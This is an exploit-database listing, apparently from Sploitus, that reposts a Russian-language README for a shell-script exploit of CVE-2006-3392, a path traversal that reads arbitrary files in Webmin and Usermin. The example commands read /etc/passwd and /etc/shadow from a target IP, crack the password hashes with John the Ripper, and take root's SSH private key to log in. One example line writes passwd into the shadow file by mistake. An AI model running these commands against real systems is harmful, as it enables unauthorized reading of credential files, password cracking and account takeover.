Sploitus

Exploit for CVE-2006-3392

kitploit · 2026-09-03

Exploit Code

MARKDOWN38 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-G1VI-CVE-2006-3392
# CVE-2006-3392

https://www.cvedetails.com/cve/CVE-2006-3392/

Webmin версий до 1.290 и Usermin версий до 1.220 вызывают функцию simplify_path до декодирования HTML, что позволяет удалённым злоумышленникам читать произвольные файлы, как показано на примере использования последовательностей "..%01", которые обходят удаление последовательностей "../" до того, как байты, такие как "%01", удаляются из имени файла. ПРИМЕЧАНИЕ: Это другая проблема, нежели CVE-2006-3274.

### Использование

Просмотр любого файла в файловой системе с правами root

root@kitploit:~
    
    
    ./exploit.sh <target ip> <target port> <file to disclose>
    

### Примеры

Просмотр файлов passwd и shadow на 10.10.11.105, объединение (unshadow) и взлом хэшей

root@kitploit:~
    
    
    ./exploit.sh 10.10.11.105 10000 /etc/passwd > passwd
    ./exploit.sh 10.10.11.105 10000 /etc/passwd > shadow
    unshadow passwd shadow > unshadowed
    john --wordlist=<your fave wordlist here> unshadowed
    

Просмотр закрытого ключа RSA на 10.10.11.105

root@kitploit:~
    
    
    ./exploit.sh 10.10.11.105 10000 /root/.ssh/id_rsa > private_key
    chmod 600 ./private_key
    ssh -i private_key some-email@example.com